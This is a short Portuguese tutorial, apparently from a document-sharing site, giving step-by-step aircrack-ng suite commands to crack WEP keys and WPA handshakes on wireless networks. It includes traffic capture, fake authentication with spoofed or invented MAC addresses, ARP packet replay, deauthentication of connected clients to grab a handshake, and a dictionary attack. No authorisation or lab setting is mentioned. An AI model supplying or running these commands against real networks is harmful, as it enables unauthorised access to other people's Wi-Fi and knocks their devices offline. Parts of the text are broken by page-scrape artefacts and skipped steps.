Escolar Documentos
Profissional Documentos
Cultura Documentos
GRUPO 1:
I - Abrir Linux, depois abrir a linha de comandos SHELL no icom na barra de tarrefas do canto inferior
esquerdo:
II - Comandos para verificar a inteterface (placa de rede wireless):
#iwconfig
Quando aparecer as interfaces escolher a interface wireless. Pode ter o nome de WLAN0, WLAN1, ETH0,
ATH0, RAUSB0,...
Quando ver quais as redes preferidas fazer CTR+C para parar e copiar o endereço MAC_AP (BSSID).
#airodump-ng -w out -c nº_canal --bssid MAC_AP rausb0
---------------------------------------------------------------------------------------------------
3 - Abrir novo shell para autenticar:
#aireplay-ng -e nome_rede -1 0 -b MAC_AP -h MAC_Cliente rausb0
Nota: MAC_Cliente pode ser um mac de PC ou mac falso (exemplo 00:11:22:33:44:55). Nome de rede é a mesma
que SSID. Por exemplo: ThomsonD569
a) Se autenticação for sucessefull, repitir o mesmo comando e alterar em vez de "-1 0" deve-se colocar somente
"-3" para mandar pacotes ARP e começar a capturar dados que contém chaves:
#aireplay-ng -e nome_rede -3 -b MAC_AP -h MAC_Cliente rausb0
-------------------------------------------------------------------
4 - Abrir novo shell para PROCURAR CHAVES:
#aircrack-ng -0 out-01.cap
esperar a chave vai ser procurada e quando enconterado é apresentado KEY FOUND no ecrã a cor vermelho.
Copia a chave e guarda no computador ou numa folha de papel.
///////////////////////////////////////////////////////////////////////////////////////
GRUPO 2
No caso de WPA:
Até passo 2 é tudo igual.
Neste caso não precisa de se autenticar, por isso só precisarmor de ver um cliente ligado ao BSSID da rede que
precisamos capturar; Copiar a o endereço mac deste cliente e trocar o mac do nosso PC igual ao outro MAC.
1 - Para trocar o endereço MAC do cliente primeiro tem que parar a interface de rede:
a) Parar interface de rede:
#airmon-ng stop rausb0
#ifconfig rausb0 down
1ágina p
aircrack
3 - Dpois abrir novo shell para apanhar sintese de password "handshack" (password protegido)
Desautenticar palavra passe protegido no cliente
#aireplay-ng -e nome_rede -0 5 -a MAC_AP rausb0
#aireplay-ng -e nome_rede -0 5 -a MAC_AP -c MAC_Cliente rausb0
Depois deste comandos verificar no primeiro shell quando aparecer a mensagem "1 handshack captured ...", pode
parar a captura com o comando "control + C" e procurar a chave no dicionario usando também o ficheiro de
captura que neste caso tem o nome de out-01.cap. Comando a utilizar:
#aircrack-ng -0 -w nome_dicionario out-01.cap
BOA SORTE...................
Luís Brito
2ágina p